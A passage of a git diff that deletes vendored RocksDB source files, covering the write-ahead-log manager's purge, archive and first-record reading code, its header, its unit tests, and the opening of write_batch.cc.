-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log, "Can't get current time: %s",
-                    s.ToString().c_str());
-    assert(false);
-    return;
-  }
-  uint64_t const now_seconds = static_cast<uint64_t>(current_time);
-  uint64_t const time_to_check = (ttl_enabled && !size_limit_enabled)
-                                     ? db_options_.wal_ttl_seconds / 2
-                                     : kDefaultIntervalToDeleteObsoleteWAL;
-
-  if (purge_wal_files_last_run_ + time_to_check > now_seconds) {
-    return;
-  }
-
-  purge_wal_files_last_run_ = now_seconds;
-
-  std::string archival_dir = ArchivalDirectory(db_options_.wal_dir);
-  std::vector<std::string> files;
-  s = env_->GetChildren(archival_dir, &files);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log, "Can't get archive files: %s",
-                    s.ToString().c_str());
-    assert(false);
-    return;
-  }
-
-  size_t log_files_num = 0;
-  uint64_t log_file_size = 0;
-
-  for (auto& f : files) {
-    uint64_t number;
-    FileType type;
-    if (ParseFileName(f, &number, &type) && type == kLogFile) {
-      std::string const file_path = archival_dir + "/" + f;
-      if (ttl_enabled) {
-        uint64_t file_m_time;
-        s = env_->GetFileModificationTime(file_path, &file_m_time);
-        if (!s.ok()) {
-          ROCKS_LOG_WARN(db_options_.info_log,
-                         "Can't get file mod time: %s: %s", file_path.c_str(),
-                         s.ToString().c_str());
-          continue;
-        }
-        if (now_seconds - file_m_time > db_options_.wal_ttl_seconds) {
-          s = env_->DeleteFile(file_path);
-          if (!s.ok()) {
-            ROCKS_LOG_WARN(db_options_.info_log, "Can't delete file: %s: %s",
-                           file_path.c_str(), s.ToString().c_str());
-            continue;
-          } else {
-            MutexLock l(&read_first_record_cache_mutex_);
-            read_first_record_cache_.erase(number);
-          }
-          continue;
-        }
-      }
-
-      if (size_limit_enabled) {
-        uint64_t file_size;
-        s = env_->GetFileSize(file_path, &file_size);
-        if (!s.ok()) {
-          ROCKS_LOG_ERROR(db_options_.info_log,
-                          "Unable to get file size: %s: %s", file_path.c_str(),
-                          s.ToString().c_str());
-          return;
-        } else {
-          if (file_size > 0) {
-            log_file_size = std::max(log_file_size, file_size);
-            ++log_files_num;
-          } else {
-            s = env_->DeleteFile(file_path);
-            if (!s.ok()) {
-              ROCKS_LOG_WARN(db_options_.info_log,
-                             "Unable to delete file: %s: %s", file_path.c_str(),
-                             s.ToString().c_str());
-              continue;
-            } else {
-              MutexLock l(&read_first_record_cache_mutex_);
-              read_first_record_cache_.erase(number);
-            }
-          }
-        }
-      }
-    }
-  }
-
-  if (0 == log_files_num || !size_limit_enabled) {
-    return;
-  }
-
-  size_t const files_keep_num =
-      db_options_.wal_size_limit_mb * 1024 * 1024 / log_file_size;
-  if (log_files_num <= files_keep_num) {
-    return;
-  }
-
-  size_t files_del_num = log_files_num - files_keep_num;
-  VectorLogPtr archived_logs;
-  GetSortedWalsOfType(archival_dir, archived_logs, kArchivedLogFile);
-
-  if (files_del_num > archived_logs.size()) {
-    ROCKS_LOG_WARN(db_options_.info_log,
-                   "Trying to delete more archived log files than "
-                   "exist. Deleting all");
-    files_del_num = archived_logs.size();
-  }
-
-  for (size_t i = 0; i < files_del_num; ++i) {
-    std::string const file_path = archived_logs[i]->PathName();
-    s = env_->DeleteFile(db_options_.wal_dir + "/" + file_path);
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(db_options_.info_log, "Unable to delete file: %s: %s",
-                     file_path.c_str(), s.ToString().c_str());
-      continue;
-    } else {
-      MutexLock l(&read_first_record_cache_mutex_);
-      read_first_record_cache_.erase(archived_logs[i]->LogNumber());
-    }
-  }
-}
-
-void WalManager::ArchiveWALFile(const std::string& fname, uint64_t number) {
-  auto archived_log_name = ArchivedLogFileName(db_options_.wal_dir, number);
-  // The sync point below is used in (DBTest,TransactionLogIteratorRace)
-  TEST_SYNC_POINT("WalManager::PurgeObsoleteFiles:1");
-  Status s = env_->RenameFile(fname, archived_log_name);
-  // The sync point below is used in (DBTest,TransactionLogIteratorRace)
-  TEST_SYNC_POINT("WalManager::PurgeObsoleteFiles:2");
-  ROCKS_LOG_INFO(db_options_.info_log, "Move log file %s to %s -- %s\n",
-                 fname.c_str(), archived_log_name.c_str(),
-                 s.ToString().c_str());
-}
-
-namespace {
-struct CompareLogByPointer {
-  bool operator()(const std::unique_ptr<LogFile>& a,
-                  const std::unique_ptr<LogFile>& b) {
-    LogFileImpl* a_impl = static_cast_with_check<LogFileImpl, LogFile>(a.get());
-    LogFileImpl* b_impl = static_cast_with_check<LogFileImpl, LogFile>(b.get());
-    return *a_impl < *b_impl;
-  }
-};
-}
-
-Status WalManager::GetSortedWalsOfType(const std::string& path,
-                                       VectorLogPtr& log_files,
-                                       WalFileType log_type) {
-  std::vector<std::string> all_files;
-  const Status status = env_->GetChildren(path, &all_files);
-  if (!status.ok()) {
-    return status;
-  }
-  log_files.reserve(all_files.size());
-  for (const auto& f : all_files) {
-    uint64_t number;
-    FileType type;
-    if (ParseFileName(f, &number, &type) && type == kLogFile) {
-      SequenceNumber sequence;
-      Status s = ReadFirstRecord(log_type, number, &sequence);
-      if (!s.ok()) {
-        return s;
-      }
-      if (sequence == 0) {
-        // empty file
-        continue;
-      }
-
-      // Reproduce the race condition where a log file is moved
-      // to archived dir, between these two sync points, used in
-      // (DBTest,TransactionLogIteratorRace)
-      TEST_SYNC_POINT("WalManager::GetSortedWalsOfType:1");
-      TEST_SYNC_POINT("WalManager::GetSortedWalsOfType:2");
-
-      uint64_t size_bytes;
-      s = env_->GetFileSize(LogFileName(path, number), &size_bytes);
-      // re-try in case the alive log file has been moved to archive.
-      std::string archived_file = ArchivedLogFileName(path, number);
-      if (!s.ok() && log_type == kAliveLogFile &&
-          env_->FileExists(archived_file).ok()) {
-        s = env_->GetFileSize(archived_file, &size_bytes);
-        if (!s.ok() && env_->FileExists(archived_file).IsNotFound()) {
-          // oops, the file just got deleted from archived dir! move on
-          s = Status::OK();
-          continue;
-        }
-      }
-      if (!s.ok()) {
-        return s;
-      }
-
-      log_files.push_back(std::unique_ptr<LogFile>(
-          new LogFileImpl(number, log_type, sequence, size_bytes)));
-    }
-  }
-  CompareLogByPointer compare_log_files;
-  std::sort(log_files.begin(), log_files.end(), compare_log_files);
-  return status;
-}
-
-Status WalManager::RetainProbableWalFiles(VectorLogPtr& all_logs,
-                                          const SequenceNumber target) {
-  int64_t start = 0;  // signed to avoid overflow when target is < first file.
-  int64_t end = static_cast<int64_t>(all_logs.size()) - 1;
-  // Binary Search. avoid opening all files.
-  while (end >= start) {
-    int64_t mid = start + (end - start) / 2;  // Avoid overflow.
-    SequenceNumber current_seq_num = all_logs.at(mid)->StartSequence();
-    if (current_seq_num == target) {
-      end = mid;
-      break;
-    } else if (current_seq_num < target) {
-      start = mid + 1;
-    } else {
-      end = mid - 1;
-    }
-  }
-  // end could be -ve.
-  size_t start_index = std::max(static_cast<int64_t>(0), end);
-  // The last wal file is always included
-  all_logs.erase(all_logs.begin(), all_logs.begin() + start_index);
-  return Status::OK();
-}
-
-Status WalManager::ReadFirstRecord(const WalFileType type,
-                                   const uint64_t number,
-                                   SequenceNumber* sequence) {
-  *sequence = 0;
-  if (type != kAliveLogFile && type != kArchivedLogFile) {
-    ROCKS_LOG_ERROR(db_options_.info_log, "[WalManger] Unknown file type %s",
-                    ToString(type).c_str());
-    return Status::NotSupported(
-        "File Type Not Known " + ToString(type));
-  }
-  {
-    MutexLock l(&read_first_record_cache_mutex_);
-    auto itr = read_first_record_cache_.find(number);
-    if (itr != read_first_record_cache_.end()) {
-      *sequence = itr->second;
-      return Status::OK();
-    }
-  }
-  Status s;
-  if (type == kAliveLogFile) {
-    std::string fname = LogFileName(db_options_.wal_dir, number);
-    s = ReadFirstLine(fname, number, sequence);
-    if (env_->FileExists(fname).ok() && !s.ok()) {
-      // return any error that is not caused by non-existing file
-      return s;
-    }
-  }
-
-  if (type == kArchivedLogFile || !s.ok()) {
-    //  check if the file got moved to archive.
-    std::string archived_file =
-        ArchivedLogFileName(db_options_.wal_dir, number);
-    s = ReadFirstLine(archived_file, number, sequence);
-    // maybe the file was deleted from archive dir. If that's the case, return
-    // Status::OK(). The caller with identify this as empty file because
-    // *sequence == 0
-    if (!s.ok() && env_->FileExists(archived_file).IsNotFound()) {
-      return Status::OK();
-    }
-  }
-
-  if (s.ok() && *sequence != 0) {
-    MutexLock l(&read_first_record_cache_mutex_);
-    read_first_record_cache_.insert({number, *sequence});
-  }
-  return s;
-}
-
-// the function returns status.ok() and sequence == 0 if the file exists, but is
-// empty
-Status WalManager::ReadFirstLine(const std::string& fname,
-                                 const uint64_t number,
-                                 SequenceNumber* sequence) {
-  struct LogReporter : public log::Reader::Reporter {
-    Env* env;
-    Logger* info_log;
-    const char* fname;
-
-    Status* status;
-    bool ignore_error;  // true if db_options_.paranoid_checks==false
-    virtual void Corruption(size_t bytes, const Status& s) override {
-      ROCKS_LOG_WARN(info_log, "[WalManager] %s%s: dropping %d bytes; %s",
-                     (this->ignore_error ? "(ignoring error) " : ""), fname,
-                     static_cast<int>(bytes), s.ToString().c_str());
-      if (this->status->ok()) {
-        // only keep the first error
-        *this->status = s;
-      }
-    }
-  };
-
-  std::unique_ptr<SequentialFile> file;
-  Status status = env_->NewSequentialFile(
-      fname, &file, env_->OptimizeForLogRead(env_options_));
-  unique_ptr<SequentialFileReader> file_reader(
-      new SequentialFileReader(std::move(file)));
-
-  if (!status.ok()) {
-    return status;
-  }
-
-  LogReporter reporter;
-  reporter.env = env_;
-  reporter.info_log = db_options_.info_log.get();
-  reporter.fname = fname.c_str();
-  reporter.status = &status;
-  reporter.ignore_error = !db_options_.paranoid_checks;
-  log::Reader reader(db_options_.info_log, std::move(file_reader), &reporter,
-                     true /*checksum*/, 0 /*initial_offset*/, number);
-  std::string scratch;
-  Slice record;
-
-  if (reader.ReadRecord(&record, &scratch) &&
-      (status.ok() || !db_options_.paranoid_checks)) {
-    if (record.size() < WriteBatchInternal::kHeader) {
-      reporter.Corruption(record.size(),
-                          Status::Corruption("log record too small"));
-      // TODO read record's till the first no corrupt entry?
-    } else {
-      WriteBatch batch;
-      WriteBatchInternal::SetContents(&batch, record);
-      *sequence = WriteBatchInternal::Sequence(&batch);
-      return Status::OK();
-    }
-  }
-
-  // ReadRecord returns false on EOF, which means that the log file is empty. we
-  // return status.ok() in that case and set sequence number to 0
-  *sequence = 0;
-  return status;
-}
-
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/wal_manager.h b/thirdparty/rocksdb/db/wal_manager.h
deleted file mode 100644
index aa62d79..0000000
--- a/thirdparty/rocksdb/db/wal_manager.h
+++ /dev/null
@@ -1,95 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <atomic>
-#include <deque>
-#include <limits>
-#include <set>
-#include <utility>
-#include <vector>
-#include <string>
-#include <memory>
-
-#include "db/version_set.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-class WalManager {
- public:
-  WalManager(const ImmutableDBOptions& db_options,
-             const EnvOptions& env_options)
-      : db_options_(db_options),
-        env_options_(env_options),
-        env_(db_options.env),
-        purge_wal_files_last_run_(0) {}
-
-  Status GetSortedWalFiles(VectorLogPtr& files);
-
-  Status GetUpdatesSince(
-      SequenceNumber seq_number, std::unique_ptr<TransactionLogIterator>* iter,
-      const TransactionLogIterator::ReadOptions& read_options,
-      VersionSet* version_set);
-
-  void PurgeObsoleteWALFiles();
-
-  void ArchiveWALFile(const std::string& fname, uint64_t number);
-
-  Status TEST_ReadFirstRecord(const WalFileType type, const uint64_t number,
-                              SequenceNumber* sequence) {
-    return ReadFirstRecord(type, number, sequence);
-  }
-
-  Status TEST_ReadFirstLine(const std::string& fname, const uint64_t number,
-                            SequenceNumber* sequence) {
-    return ReadFirstLine(fname, number, sequence);
-  }
-
- private:
-  Status GetSortedWalsOfType(const std::string& path, VectorLogPtr& log_files,
-                             WalFileType type);
-  // Requires: all_logs should be sorted with earliest log file first
-  // Retains all log files in all_logs which contain updates with seq no.
-  // Greater Than or Equal to the requested SequenceNumber.
-  Status RetainProbableWalFiles(VectorLogPtr& all_logs,
-                                const SequenceNumber target);
-
-  Status ReadFirstRecord(const WalFileType type, const uint64_t number,
-                         SequenceNumber* sequence);
-
-  Status ReadFirstLine(const std::string& fname, const uint64_t number,
-                       SequenceNumber* sequence);
-
-  // ------- state from DBImpl ------
-  const ImmutableDBOptions& db_options_;
-  const EnvOptions& env_options_;
-  Env* env_;
-
-  // ------- WalManager state -------
-  // cache for ReadFirstRecord() calls
-  std::unordered_map<uint64_t, SequenceNumber> read_first_record_cache_;
-  port::Mutex read_first_record_cache_mutex_;
-
-  // last time when PurgeObsoleteWALFiles ran.
-  uint64_t purge_wal_files_last_run_;
-
-  // obsolete files will be deleted every this seconds if ttl deletion is
-  // enabled and archive size_limit is disabled.
-  static const uint64_t kDefaultIntervalToDeleteObsoleteWAL = 600;
-};
-
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/wal_manager_test.cc b/thirdparty/rocksdb/db/wal_manager_test.cc
deleted file mode 100644
index 9f5cf27..0000000
--- a/thirdparty/rocksdb/db/wal_manager_test.cc
+++ /dev/null
@@ -1,310 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <string>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/write_buffer_manager.h"
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/log_writer.h"
-#include "db/version_set.h"
-#include "db/wal_manager.h"
-#include "env/mock_env.h"
-#include "table/mock_table.h"
-#include "util/file_reader_writer.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-// TODO(icanadi) mock out VersionSet
-// TODO(icanadi) move other WalManager-specific tests from db_test here
-class WalManagerTest : public testing::Test {
- public:
-  WalManagerTest()
-      : env_(new MockEnv(Env::Default())),
-        dbname_(test::TmpDir() + "/wal_manager_test"),
-        db_options_(),
-        table_cache_(NewLRUCache(50000, 16)),
-        write_buffer_manager_(db_options_.db_write_buffer_size),
-        current_log_number_(0) {
-    DestroyDB(dbname_, Options());
-  }
-
-  void Init() {
-    ASSERT_OK(env_->CreateDirIfMissing(dbname_));
-    ASSERT_OK(env_->CreateDirIfMissing(ArchivalDirectory(dbname_)));
-    db_options_.db_paths.emplace_back(dbname_,
-                                      std::numeric_limits<uint64_t>::max());
-    db_options_.wal_dir = dbname_;
-    db_options_.env = env_.get();
-
-    versions_.reset(new VersionSet(dbname_, &db_options_, env_options_,
-                                   table_cache_.get(), &write_buffer_manager_,
-                                   &write_controller_));
-
-    wal_manager_.reset(new WalManager(db_options_, env_options_));
-  }
-
-  void Reopen() {
-    wal_manager_.reset(new WalManager(db_options_, env_options_));
-  }
-
-  // NOT thread safe
-  void Put(const std::string& key, const std::string& value) {
-    assert(current_log_writer_.get() != nullptr);
-    uint64_t seq =  versions_->LastSequence() + 1;
-    WriteBatch batch;
-    batch.Put(key, value);
-    WriteBatchInternal::SetSequence(&batch, seq);
-    current_log_writer_->AddRecord(WriteBatchInternal::Contents(&batch));
-    versions_->SetLastToBeWrittenSequence(seq);
-    versions_->SetLastSequence(seq);
-  }
-
-  // NOT thread safe
-  void RollTheLog(bool archived) {
-    current_log_number_++;
-    std::string fname = ArchivedLogFileName(dbname_, current_log_number_);
-    unique_ptr<WritableFile> file;
-    ASSERT_OK(env_->NewWritableFile(fname, &file, env_options_));
-    unique_ptr<WritableFileWriter> file_writer(
-        new WritableFileWriter(std::move(file), env_options_));
-    current_log_writer_.reset(new log::Writer(std::move(file_writer), 0, false));
-  }
-
-  void CreateArchiveLogs(int num_logs, int entries_per_log) {
-    for (int i = 1; i <= num_logs; ++i) {
-      RollTheLog(true);
-      for (int k = 0; k < entries_per_log; ++k) {
-        Put(ToString(k), std::string(1024, 'a'));
-      }
-    }
-  }
-
-  std::unique_ptr<TransactionLogIterator> OpenTransactionLogIter(
-      const SequenceNumber seq) {
-    unique_ptr<TransactionLogIterator> iter;
-    Status status = wal_manager_->GetUpdatesSince(
-        seq, &iter, TransactionLogIterator::ReadOptions(), versions_.get());
-    EXPECT_OK(status);
-    return iter;
-  }
-
-  std::unique_ptr<MockEnv> env_;
-  std::string dbname_;
-  ImmutableDBOptions db_options_;
-  WriteController write_controller_;
-  EnvOptions env_options_;
-  std::shared_ptr<Cache> table_cache_;
-  WriteBufferManager write_buffer_manager_;
-  std::unique_ptr<VersionSet> versions_;
-  std::unique_ptr<WalManager> wal_manager_;
-
-  std::unique_ptr<log::Writer> current_log_writer_;
-  uint64_t current_log_number_;
-};
-
-TEST_F(WalManagerTest, ReadFirstRecordCache) {
-  Init();
-  std::string path = dbname_ + "/000001.log";
-  unique_ptr<WritableFile> file;
-  ASSERT_OK(env_->NewWritableFile(path, &file, EnvOptions()));
-
-  SequenceNumber s;
-  ASSERT_OK(wal_manager_->TEST_ReadFirstLine(path, 1 /* number */, &s));
-  ASSERT_EQ(s, 0U);
-
-  ASSERT_OK(
-      wal_manager_->TEST_ReadFirstRecord(kAliveLogFile, 1 /* number */, &s));
-  ASSERT_EQ(s, 0U);
-
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(file), EnvOptions()));
-  log::Writer writer(std::move(file_writer), 1,
-                     db_options_.recycle_log_file_num > 0);
-  WriteBatch batch;
-  batch.Put("foo", "bar");
-  WriteBatchInternal::SetSequence(&batch, 10);
-  writer.AddRecord(WriteBatchInternal::Contents(&batch));
-
-  // TODO(icanadi) move SpecialEnv outside of db_test, so we can reuse it here.
-  // Waiting for lei to finish with db_test
-  // env_->count_sequential_reads_ = true;
-  // sequential_read_counter_ sanity test
-  // ASSERT_EQ(env_->sequential_read_counter_.Read(), 0);
-
-  ASSERT_OK(wal_manager_->TEST_ReadFirstRecord(kAliveLogFile, 1, &s));
-  ASSERT_EQ(s, 10U);
-  // did a read
-  // TODO(icanadi) move SpecialEnv outside of db_test, so we can reuse it here
-  // ASSERT_EQ(env_->sequential_read_counter_.Read(), 1);
-
-  ASSERT_OK(wal_manager_->TEST_ReadFirstRecord(kAliveLogFile, 1, &s));
-  ASSERT_EQ(s, 10U);
-  // no new reads since the value is cached
-  // TODO(icanadi) move SpecialEnv outside of db_test, so we can reuse it here
-  // ASSERT_EQ(env_->sequential_read_counter_.Read(), 1);
-}
-
-namespace {
-uint64_t GetLogDirSize(std::string dir_path, Env* env) {
-  uint64_t dir_size = 0;
-  std::vector<std::string> files;
-  env->GetChildren(dir_path, &files);
-  for (auto& f : files) {
-    uint64_t number;
-    FileType type;
-    if (ParseFileName(f, &number, &type) && type == kLogFile) {
-      std::string const file_path = dir_path + "/" + f;
-      uint64_t file_size;
-      env->GetFileSize(file_path, &file_size);
-      dir_size += file_size;
-    }
-  }
-  return dir_size;
-}
-std::vector<std::uint64_t> ListSpecificFiles(
-    Env* env, const std::string& path, const FileType expected_file_type) {
-  std::vector<std::string> files;
-  std::vector<uint64_t> file_numbers;
-  env->GetChildren(path, &files);
-  uint64_t number;
-  FileType type;
-  for (size_t i = 0; i < files.size(); ++i) {
-    if (ParseFileName(files[i], &number, &type)) {
-      if (type == expected_file_type) {
-        file_numbers.push_back(number);
-      }
-    }
-  }
-  return file_numbers;
-}
-
-int CountRecords(TransactionLogIterator* iter) {
-  int count = 0;
-  SequenceNumber lastSequence = 0;
-  BatchResult res;
-  while (iter->Valid()) {
-    res = iter->GetBatch();
-    EXPECT_TRUE(res.sequence > lastSequence);
-    ++count;
-    lastSequence = res.sequence;
-    EXPECT_OK(iter->status());
-    iter->Next();
-  }
-  return count;
-}
-}  // namespace
-
-TEST_F(WalManagerTest, WALArchivalSizeLimit) {
-  db_options_.wal_ttl_seconds = 0;
-  db_options_.wal_size_limit_mb = 1000;
-  Init();
-
-  // TEST : Create WalManager with huge size limit and no ttl.
-  // Create some archived files and call PurgeObsoleteWALFiles().
-  // Count the archived log files that survived.
-  // Assert that all of them did.
-  // Change size limit. Re-open WalManager.
-  // Assert that archive is not greater than wal_size_limit_mb after
-  // PurgeObsoleteWALFiles()
-  // Set ttl and time_to_check_ to small values. Re-open db.
-  // Assert that there are no archived logs left.
-
-  std::string archive_dir = ArchivalDirectory(dbname_);
-  CreateArchiveLogs(20, 5000);
-
-  std::vector<std::uint64_t> log_files =
-      ListSpecificFiles(env_.get(), archive_dir, kLogFile);
-  ASSERT_EQ(log_files.size(), 20U);
-
-  db_options_.wal_size_limit_mb = 8;
-  Reopen();
-  wal_manager_->PurgeObsoleteWALFiles();
-
-  uint64_t archive_size = GetLogDirSize(archive_dir, env_.get());
-  ASSERT_TRUE(archive_size <= db_options_.wal_size_limit_mb * 1024 * 1024);
-
-  db_options_.wal_ttl_seconds = 1;
-  env_->FakeSleepForMicroseconds(2 * 1000 * 1000);
-  Reopen();
-  wal_manager_->PurgeObsoleteWALFiles();
-
-  log_files = ListSpecificFiles(env_.get(), archive_dir, kLogFile);
-  ASSERT_TRUE(log_files.empty());
-}
-
-TEST_F(WalManagerTest, WALArchivalTtl) {
-  db_options_.wal_ttl_seconds = 1000;
-  Init();
-
-  // TEST : Create WalManager with a ttl and no size limit.
-  // Create some archived log files and call PurgeObsoleteWALFiles().
-  // Assert that files are not deleted
-  // Reopen db with small ttl.
-  // Assert that all archived logs was removed.
-
-  std::string archive_dir = ArchivalDirectory(dbname_);
-  CreateArchiveLogs(20, 5000);
-
-  std::vector<uint64_t> log_files =
-      ListSpecificFiles(env_.get(), archive_dir, kLogFile);
-  ASSERT_GT(log_files.size(), 0U);
-
-  db_options_.wal_ttl_seconds = 1;
-  env_->FakeSleepForMicroseconds(3 * 1000 * 1000);
-  Reopen();
-  wal_manager_->PurgeObsoleteWALFiles();
-
-  log_files = ListSpecificFiles(env_.get(), archive_dir, kLogFile);
-  ASSERT_TRUE(log_files.empty());
-}
-
-TEST_F(WalManagerTest, TransactionLogIteratorMoveOverZeroFiles) {
-  Init();
-  RollTheLog(false);
-  Put("key1", std::string(1024, 'a'));
-  // Create a zero record WAL file.
-  RollTheLog(false);
-  RollTheLog(false);
-
-  Put("key2", std::string(1024, 'a'));
-
-  auto iter = OpenTransactionLogIter(0);
-  ASSERT_EQ(2, CountRecords(iter.get()));
-}
-
-TEST_F(WalManagerTest, TransactionLogIteratorJustEmptyFile) {
-  Init();
-  RollTheLog(false);
-  auto iter = OpenTransactionLogIter(0);
-  // Check that an empty iterator is returned
-  ASSERT_TRUE(!iter->Valid());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as WalManager is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/write_batch.cc b/thirdparty/rocksdb/db/write_batch.cc
deleted file mode 100644
index 76fc948..0000000
--- a/thirdparty/rocksdb/db/write_batch.cc
+++ /dev/null
@@ -1,1451 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// WriteBatch::rep_ :=
-//    sequence: fixed64
-//    count: fixed32
-//    data: record[count]
-// record :=
-//    kTypeValue varstring varstring
-//    kTypeDeletion varstring
-//    kTypeSingleDeletion varstring
-//    kTypeMerge varstring varstring
-//    kTypeColumnFamilyValue varint32 varstring varstring
-//    kTypeColumnFamilyDeletion varint32 varstring varstring
-//    kTypeColumnFamilySingleDeletion varint32 varstring varstring
-//    kTypeColumnFamilyMerge varint32 varstring varstring
-//    kTypeBeginPrepareXID varstring
-//    kTypeEndPrepareXID
-//    kTypeCommitXID varstring
-//    kTypeRollbackXID varstring
-//    kTypeNoop
-// varstring :=
-//    len: varint32
-//    data: uint8[len]
-
-#include "rocksdb/write_batch.h"
-
-#include <map>
-#include <stack>
-#include <stdexcept>
-#include <type_traits>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/flush_scheduler.h"
-#include "db/memtable.h"
-#include "db/merge_context.h"
-#include "db/snapshot_impl.h"
-#include "db/write_batch_internal.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/statistics.h"
-#include "rocksdb/merge_operator.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-// anon namespace for file-local types
-namespace {
-
-enum ContentFlags : uint32_t {
-  DEFERRED = 1 << 0,
-  HAS_PUT = 1 << 1,
-  HAS_DELETE = 1 << 2,
-  HAS_SINGLE_DELETE = 1 << 3,
-  HAS_MERGE = 1 << 4,
-  HAS_BEGIN_PREPARE = 1 << 5,
-  HAS_END_PREPARE = 1 << 6,
-  HAS_COMMIT = 1 << 7,
-  HAS_ROLLBACK = 1 << 8,
-  HAS_DELETE_RANGE = 1 << 9,
-  HAS_BLOB_INDEX = 1 << 10,
-};
-
-struct BatchContentClassifier : public WriteBatch::Handler {
-  uint32_t content_flags = 0;
-
-  Status PutCF(uint32_t, const Slice&, const Slice&) override {
-    content_flags |= ContentFlags::HAS_PUT;
-    return Status::OK();
-  }
-
-  Status DeleteCF(uint32_t, const Slice&) override {
-    content_flags |= ContentFlags::HAS_DELETE;
-    return Status::OK();
-  }
-
-  Status SingleDeleteCF(uint32_t, const Slice&) override {
-    content_flags |= ContentFlags::HAS_SINGLE_DELETE;
-    return Status::OK();
-  }
-
-  Status DeleteRangeCF(uint32_t, const Slice&, const Slice&) override {
-    content_flags |= ContentFlags::HAS_DELETE_RANGE;
-    return Status::OK();
-  }
-
-  Status MergeCF(uint32_t, const Slice&, const Slice&) override {
-    content_flags |= ContentFlags::HAS_MERGE;
-    return Status::OK();
-  }
-
-  Status PutBlobIndexCF(uint32_t, const Slice&, const Slice&) override {
-    content_flags |= ContentFlags::HAS_BLOB_INDEX;
-    return Status::OK();
-  }
-
-  Status MarkBeginPrepare() override {
-    content_flags |= ContentFlags::HAS_BEGIN_PREPARE;
-    return Status::OK();
-  }
-
-  Status MarkEndPrepare(const Slice&) override {
-    content_flags |= ContentFlags::HAS_END_PREPARE;
-    return Status::OK();
-  }
-
-  Status MarkCommit(const Slice&) override {
-    content_flags |= ContentFlags::HAS_COMMIT;
-    return Status::OK();
-  }
-
-  Status MarkRollback(const Slice&) override {
-    content_flags |= ContentFlags::HAS_ROLLBACK;
-    return Status::OK();
-  }
-};
-
-}  // anon namespace
-
-struct SavePoints {
-  std::stack<SavePoint> stack;
-};
-
-WriteBatch::WriteBatch(size_t reserved_bytes, size_t max_bytes)
-    : save_points_(nullptr), content_flags_(0), max_bytes_(max_bytes), rep_() {
-  rep_.reserve((reserved_bytes > WriteBatchInternal::kHeader) ?
-    reserved_bytes : WriteBatchInternal::kHeader);
-  rep_.resize(WriteBatchInternal::kHeader);
-}
-
-WriteBatch::WriteBatch(const std::string& rep)
-    : save_points_(nullptr),
-      content_flags_(ContentFlags::DEFERRED),
-      max_bytes_(0),
-      rep_(rep) {}
-
-WriteBatch::WriteBatch(const WriteBatch& src)
-    : save_points_(src.save_points_),
-      wal_term_point_(src.wal_term_point_),
-      content_flags_(src.content_flags_.load(std::memory_order_relaxed)),
-      max_bytes_(src.max_bytes_),
-      rep_(src.rep_) {}
-
-WriteBatch::WriteBatch(WriteBatch&& src)
-    : save_points_(std::move(src.save_points_)),
-      wal_term_point_(std::move(src.wal_term_point_)),
-      content_flags_(src.content_flags_.load(std::memory_order_relaxed)),
-      max_bytes_(src.max_bytes_),
-      rep_(std::move(src.rep_)) {}
-
-WriteBatch& WriteBatch::operator=(const WriteBatch& src) {
-  if (&src != this) {
-    this->~WriteBatch();
-    new (this) WriteBatch(src);
-  }
-  return *this;
-}
-
-WriteBatch& WriteBatch::operator=(WriteBatch&& src) {
-  if (&src != this) {
-    this->~WriteBatch();
-    new (this) WriteBatch(std::move(src));
-  }
-  return *this;
-}
-
-WriteBatch::~WriteBatch() { delete save_points_; }
-
-WriteBatch::Handler::~Handler() { }
-
-void WriteBatch::Handler::LogData(const Slice& blob) {
-  // If the user has not specified something to do with blobs, then we ignore
-  // them.
-}
-
-bool WriteBatch::Handler::Continue() {
-  return true;
-}
-
-void WriteBatch::Clear() {
-  rep_.clear();
-  rep_.resize(WriteBatchInternal::kHeader);
-
-  content_flags_.store(0, std::memory_order_relaxed);
-
-  if (save_points_ != nullptr) {
-    while (!save_points_->stack.empty()) {
-      save_points_->stack.pop();
-    }
-  }
-
-  wal_term_point_.clear();
-}
-
-int WriteBatch::Count() const {
